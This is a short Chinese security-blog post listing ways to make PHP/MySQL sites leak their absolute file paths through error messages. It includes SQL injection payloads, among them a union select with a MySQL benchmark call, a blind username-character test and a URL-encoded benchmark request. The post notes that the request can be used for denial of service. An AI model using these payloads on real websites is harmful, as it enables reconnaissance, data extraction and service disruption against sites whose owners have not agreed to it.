河北网络安全博客

河北博客是一个关注网络安全、网站设计、网站推广、网站优化SEO、网站建设的河北地方博客。

« 吸引链接的三十招技巧常见硬盘加密解密的几种方法解析 »

php+mysql如何爆页面绝对路径

1、加引号’这个最常用 


2、变参数类型,比如把id=1改为id=a等 有时很有效果 


3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果 


4、text.php?aa[]=xx 


5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试. 


6、benchmark( 999999999999999999, md5( ’test’ ) ) 

   BENCHMARK(count,expr):BENCHMARK()函数重复countTimes次执行表达式expr,它可以用于计时MySQL处理表达式有多快。结果值总是0。 

   id=1 union select 1,benchmark(500000,md5(’test’)),1 from user where userid=1 and ord(substring(username,1,1))=97 /* 

   利用找个函数可以作拒绝服务攻击!!http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41)),不过前提还是要求可以注射。




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅河北博客

河北博客站内搜索

河北博客相关链接

河北博客热文排行

最新评论及回复

最近发表

网站收藏

Powered By kingwq's blog

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP备09002514号.Copyright www.kingwq.cn.2010